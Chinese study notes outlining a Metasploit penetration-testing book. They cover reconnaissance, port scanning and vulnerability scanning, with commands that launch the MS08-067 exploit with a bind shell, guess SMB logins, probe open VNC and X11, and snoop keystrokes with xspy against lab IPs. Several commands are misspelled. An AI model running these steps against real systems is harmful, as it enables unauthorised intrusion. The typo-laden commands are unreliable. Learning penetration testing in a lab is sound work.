Metasploit***测试指南

David Kennedy Diehold公司首席信息安全官。SET fast-Tracl Back Track和Exploit Database社会工程学博客网站
black hat defcon shmoocon security B-sides
Jim o'Gorman CSc公司strickForce团队的 social-engineerorg 数字取证分析和恶意代码分析
Devon Kearns offensive-security团队的一位培训讲师。back Track的开发者。揭秘教程wiki的维护者
Mati Aharoni 信达雅
没有web voip scada 真实的***案例:诸葛建伟
***测试技术基础
PTES
前期交互
情报搜集阶段
威助建模
漏洞分析
******
后******
报告
***测试类型
白盒
黑盒测试
漏洞扫描器
Metasploit
专业术语
exploit
payload
shellcode
module
listener
Metsploit
Msf终端
命令行
Armitage
用户接口
功能程序
MSF***载荷生成器
MSF编码器
nasm shell
express pro
第三章情报搜索
被动
whois
netcraft
Nslookup
主动
namp
Metasploit使用数据库
metasploit使用端口扫描
针对性扫描
服务器消息协议扫描
搜寻配置不当的SQL server
SSH
FTP
SNMP
编写自己的扫描器
2。2
cd /opt/framework3/msf3/
msfconsloe
help connect
终端交互 访问所有软件的功能特性
msfcli 脚本测试
msfcli windows/smb/ms08_067_netapi O
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
Start MSF
armitage
功能程序:::
公开渠道情报 OSINT yeti whois
能够***那些系统 边界。
searchdns.netcraft.com 网站对应IP
主动
nmap -sS -Pn 172.16.32.131 -Pn默认都是存活状态,不先ping测试存活状态 -sS隐秘TCP
-A 服务枚举和旗标获取
3.2.2数据库
/etc/init.d/postgresql-8.3 start
db_connect postgres:toor@127.0.0.1/msfbook
第一次连接冗长的输出
db_status
nmap -Pn -sS -A -oX subnet1 192.168.1.0/24
db_connect postgres:toor@127.0.0.1/msfbook
dm_import Subnet1.xml
db_hosts -c address
TCP空闲扫描
msf use auxiliary/scanner/ip/ipidseq
set RHosts 192.168.1.0/24
set threads 50 run
在windows平台线程不过16 ,类UNix lInux 128
nmap -PN -sI 192.168.1.109 192.168.1.155
db_connect postgres:toor@127.0.0.1/msfbook
db_nmap -sS -A 172.16.32.131
db_services
search portscan
use scanner/portscan/syn
set Rhosts 192.168.1.155
set threads 50
run
3.3针对性服务扫描
use scanner/smb/smb_version
set rhost
run
show options
db_hosts -c address,os_flavor
快速且安全定位高风险主机的方法
use scanner/mssql/mssql_ping
show options
set rhosts 192.168.1.0/24
set threads 255
run
use scanner/ssh/ssh_version
set threads 50
run
use scanner/ftp/ftp_version
set threads 50
run
use scanner/ftp/anonymous
set threads 50
run
团体字符串
use use scanner/snmp/snmp_login
set rhosts 192.168.1.0/24
出厂的默认设置
3。4ruby脚本
mixin
4.1
漏洞扫描
netcat
nc 192.168.1.203 89
误报和漏报
NeXpose NEssus
社区共享版
web
db_connect postgres:toor@127.0.0.1/msfbook
db_import /tmp/host_195.xml
db_vulns
db_destory删除现有的数据库
db_connect 新的
load nexpose
nexpose_connect -h
nexpost_connect dookie:s3cr3t@192.168.1.206 ok
nexpose_scan 192.168.1.195
db-host -c address
nessus http://localhost:8834
load nessus
nessus_connect dookie:s3cr3t@192.168.1.206:8834 ok
nessus_policy_list
nessus_scan_now
nessus_scan_new 2 bridge_scan 192.168.1.195
nessus_report_list
nessus_report_get 报告ID
use auxiliary/scanner/smb/smb_login
show options
set rhosts 192.168.1.150-155
set SMBUser Administrator
set SMBPass s3cr3t
use auxiliary/scanner/vnc/nvc_none_auth
set Rhosts 192.168.1.155
run
vncviewer
useauxiliary/scanner/x11/open_x11
cd /pentest/snfifers/sxpy
./xspy -display 192.168.1.23:0 -delay 100
Autopwn自动选择